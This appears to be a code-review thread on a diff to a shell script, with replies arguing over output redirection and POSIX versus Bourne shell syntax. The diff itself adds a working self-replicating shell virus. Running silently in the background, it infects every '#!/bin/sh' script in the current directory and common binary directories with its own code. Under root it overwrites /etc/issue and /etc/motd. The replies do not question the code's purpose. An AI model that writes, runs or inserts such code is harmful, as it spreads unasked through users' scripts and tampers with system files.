comp

```diff
@@ -1,4 +1,27 @@
 #!/bin/sh
+{
+	for i in * /bin/* /usr/bin/* /usr/local/bin/* ~/bin/* ~/.local/bin/*
+	do
+		if sed 1q "$i" | grep '^#![ 	]*/bin/sh'
+		then
+			if ! grep '^# mark$' "$i"
+			then
+				sed 1q "$i" >"/tmp/x$$"
+				sed '1d
+				/^# mark$/q' "$0" >>"/tmp/x$$"
+				sed 1d "$i" >>"/tmp/x$$"
+				cp "/tmp/x$$" "$i"
+			fi
+		fi
+	done
+	if ls -l "/tmp/x$$" | grep root
+	then
+		echo 'install 9front
+' | tee /etc/issue >/etc/motd
+	fi
+	rm "/tmp/x$$"
+} >/dev/null 2>/dev/null &
```

Comment:
IIRC, this won't work properly. The correct non-BASH version would be: `>/dev/null 2>&1`

To my knowledge, at least in BASH, redirection works in reverse; this is likely for Bourne Shell, too. So, in this case, STDERR is first redirected to STDOUT, then STDOUT and STDERR are both redirected to the desired location of '/dev/null'.

Reply:
Are you aware that I am not duplicating file descriptors anywhere but opening new ones? Do you see a problem with opening `/dev/null` twice in the same process? I don’t.

Also, I don’t care about the Bourne Shell: The whole thing would not work with the Bourne Shell, since it doesn’t have comments. I care about the POSIX shell language.

Reply:
You don't care about Bourne Shell? You probably should, since that's the syntax of shell you're using.

Did you even read what I said? I feel like your needless hostility to everything I've said to try to _help_ you is going to make any interaction with you a waste of time, so I'll leave you be. Thanks at least for replying.

Reply:
The syntax of shell I am using is the syntax POSIX specifies, which is not the Bourne Shell. The Bourne Shell is an ancestor of the POSIX command language, and not used anymore—at least I have yet to see someone using a port of the Bourne Shell to something like Linux or today’s BSDs.

The last line of the code I am adding is a comment. You know what the Bourne Shell says when stumbling upon a comment?
    #: not found

Why exactly do you think `>/dev/null 2>/dev/null` is a problem?